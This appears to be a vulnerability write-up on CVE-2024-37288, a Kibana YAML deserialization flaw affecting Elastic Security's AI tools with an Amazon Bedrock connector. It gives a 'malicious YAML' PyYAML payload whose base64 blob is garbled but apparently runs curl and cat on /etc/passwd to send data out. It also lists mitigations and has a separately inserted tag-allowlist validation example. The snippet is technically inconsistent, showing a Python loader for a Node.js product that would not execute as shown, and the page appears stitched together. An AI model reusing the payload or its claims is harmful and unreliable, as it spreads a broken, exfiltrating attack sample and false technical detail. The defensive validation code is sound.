CVE-2024-37288 - Kibana Vulnerability: Deserialization Issue Leading to Arbitrary Code Execution for Users Utilizing Elastic Security's AI Tools and Amazon Bedrock Connector

A deserialization issue in Kibana (CVE-2024-37288) can lead to arbitrary code execution when Kibana attempts to parse a YAML document containing a crafted payload. The vulnerability affects users who use Elastic Security's built-in AI tools (https://www.elastic.co/guide/en/security/current/ai-for-security.html) and have configured an Amazon Bedrock connector (https://www.elastic.co/guide/en/security/current/assistant-connect-to-bedrock.html).

Code Snippet

# Below is an example of a malicious YAML document that could exploit this vulnerability.
import yaml
payload = '''
!!python/object/new:yaml.Loader
    kwargs:
      stream: !!binary |
          aW1wb3JIG9zLCBzdWJwcm9jZXNzDQpzdWJwcm9jZXNzLmNhbGwoc
          y5gIHdoaWNoIGN1cmwgYmFzaHMgJihjYXQgL2VYy9wYXNzd2Qgf
          CBjdXJsIC1GICdwaGFzZXJfdG9rZW49XCh4eHgpJyAtLGRhdGEt
          dXJsZW5jb2RlIC1YLUluc3RhbGxlZC9iaW47ZG9uZQ==
'''
# Deserialize the malicious payload
objects_deserialized = yaml.load(payload, Loader=yaml.FullLoader)

1. An attacker crafts a malicious YAML document containing a specially crafted payload.
2. Kibana parses the malicious YAML document when Elastic Security's built-in AI tools are in use and the Amazon Bedrock connector is configured.
3. The deserialization vulnerability is exploited, allowing the attacker to execute arbitrary code with the privileges of the Kibana process.

References

- Elastic Security's AI Tools: https://www.elastic.co/guide/en/security/current/ai-for-security.html
- Amazon Bedrock Connector configuration: https://www.elastic.co/guide/en/security/current/assistant-connect-to-bedrock.html
- CVE-2024-37288: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37288

Mitigation Options

While a patch for this vulnerability is being developed, users should disable their Amazon Bedrock connector and avoid utilizing Elastic Security's AI tools if possible. Some preventative actions to protect against this Kibana vulnerability include:

1. Removing unnecessary integrations: Until a patch is released, users should reconsider using Elastic Security's AI tools and limit unnecessary integrations or configurations with Kibana.
2. Validating input of YAML documents: Implement additional checks to validate the YAML document's content or structure before parsing it in Kibana.
3. Monitoring for suspicious activity: Keep an eye on Kibana logs and network traffic for any unexpected behavior or unauthorized access attempts.
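
One way to implement the YAML validation in mitigation 2, shown with PyYAML (the library used in the snippet above): walk the composed node graph, refuse any tag outside the core YAML types, and only then parse with the safe loader. This is an added example, not Kibana's or Elastic's code; the function names, the node limit and the sample documents are assumptions made for illustration.

```python
# Added example: strict tag allowlist before parsing untrusted YAML (PyYAML).
import yaml

# Core YAML types only; language-specific or application tags are refused.
ALLOWED_TAGS = {
    "tag:yaml.org,2002:" + t
    for t in ("map", "seq", "str", "int", "float", "bool", "null")
}
MAX_NODES = 10_000  # assumed limit; tune to the largest document you expect


def find_disallowed_tags(text):
    """Return sorted tags outside ALLOWED_TAGS without constructing any object."""
    try:
        # compose() builds the node graph only; no constructors are invoked.
        root = yaml.compose(text, Loader=yaml.SafeLoader)
    except yaml.YAMLError as exc:
        raise ValueError(f"unparseable YAML: {exc}") from exc
    bad, seen = set(), set()
    stack = [root] if root is not None else []
    while stack:
        node = stack.pop()
        if id(node) in seen:  # an alias can point back at an ancestor
            continue
        seen.add(id(node))
        if len(seen) > MAX_NODES:
            raise ValueError("document exceeds node limit")
        if node.tag not in ALLOWED_TAGS:
            bad.add(node.tag)
        if isinstance(node, yaml.MappingNode):
            for key, value in node.value:
                stack.extend((key, value))
        elif isinstance(node, yaml.SequenceNode):
            stack.extend(node.value)
    return sorted(bad)


def load_untrusted(text):
    """Parse only if every node carries a core tag; always use the safe loader."""
    bad = find_disallowed_tags(text)
    if bad:
        raise ValueError(f"rejected tags: {bad}")
    return yaml.safe_load(text)


# Constructed sample inputs (not taken from a real connector configuration).
BENIGN = "connector: bedrock\nregions: [us-east-1, eu-west-1]\nretries: 3\n"
TAGGED = "connector: bedrock\nsettings: !!python/object/new:yaml.Loader\n  kwargs: {}\n"
```

The allowlist is deliberately strict: timestamps, merge keys and binary scalars are also refused unless their tags are added to `ALLOWED_TAGS`.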

Conclusion

The CVE-2024-37288 Kibana vulnerability is a serious issue that can give attackers the ability to execute arbitrary code on the affected system. Users employing Elastic Security's built-in AI tools or the Amazon Bedrock connector are encouraged to take appropriate steps to protect their systems until a patch is available.

Timeline

Published on: 09/09/2024 09:15:02 UTC
Last modified on: 09/16/2024 13:29:06 UTC